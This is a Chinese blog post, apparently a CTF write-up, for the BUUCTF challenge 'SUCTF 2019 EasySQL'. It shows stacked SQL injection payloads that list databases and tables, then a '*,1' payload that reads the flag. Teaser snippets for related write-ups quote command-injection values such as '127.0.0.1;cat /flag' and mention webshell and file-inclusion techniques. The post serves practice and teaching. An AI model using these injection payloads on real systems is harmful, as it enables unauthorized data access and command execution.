当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第五题:[SUCTF 2019]EasySQL

七星3个月前 (01-21)BUU194


[SUCTF 2019]EasySQL

打开题目,发现一个搜索框,尝试发现是堆叠注入,先查一下数据库:

1;show databases;

得到:

Array ( [0] => 1 )

Array ( [0] => ctf ) 

Array ( [0] => ctftraining ) 

Array ( [0] => information_schema ) 

Array ( [0] => mysql ) 

Array ( [0] => performance_schema ) 

Array ( [0] => test )

再查表:1;show tables;得到

Array ( [0] => 1 ) 

Array ( [0] => Flag )

然后仔细看会发现, 输入非零数字得到的回显是1,

输入其余字符没有回显

从而判断出内部的查询语句可能存在有||, 也就是:

    select (输入的数据)||(一个列名) from (表名);

然后再猜测一下,整体查询语句就如下:

    select (post进去的数据) || flag from Flag;

(Flag表名是通过上面的堆叠注入获取的)

豁然开朗, 直接:

*,1

一把嗦,原理:

select *,1 || flag from Flag;

此时的||就相当于or,即:

select *,1 from Flag

直接get flag

七星|qixingbit.com

相关文章

BUUCTF_web_第12题:[极客大挑战 2019]Knife

BUUCTF_web_第12题:[极客大挑战 2019]Knife

本题考查了中国菜刀的使用, 及简单一句话理解阅读题目打开, 发现给了一句话:直接用中国菜刀连上:在根目录下直接找到了flag...

BUUCTF_web_第15题:[极客大挑战 2019]PHP_序列化详解

BUUCTF_web_第15题:[极客大挑战 2019]PHP_序列化详解

打开题目, 有个猫, 先云吸个猫再说. 然后提到了备份网站. 既然是备份那自然想到的是www.rar或者zip之类的, 再不行就爆破一下路径也就出来了, 这个题是www.zip, 直接访问,...

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

f12, 获得Archive_room.php访问, 嗯, 他说什么什么快没看清, 不要紧, 我们可以让他慢下来开burpsuite, 抓取回显包, 得到secr3t.php访问,成功获得源码high...

BUUCTF_web_第二题:[强网杯 2019]随便注

BUUCTF_web_第二题:[强网杯 2019]随便注

第二题: [强网杯 2019]随便注 测试一下, 1'# 返回正常, 发现是字符注入,尝试show一下database: 1';show databases;%23 发现出结果了:...

BUUCTF_web_第十题:[ACTF2020 新生赛]Exec

BUUCTF_web_第十题:[ACTF2020 新生赛]Exec

打开靶场, 和之前的linux系统命令执行一样, 但是这个没过滤, 直接127.0.0.1||cat /flag或者127.0.0.1;cat /flag就好了...

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

发现是一道include的题, 啥提示也没有,点一下给个tips, 获取到一个?file=flag.php很自然想到了include可以把文件base64再读取文件:/?file=php:/...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。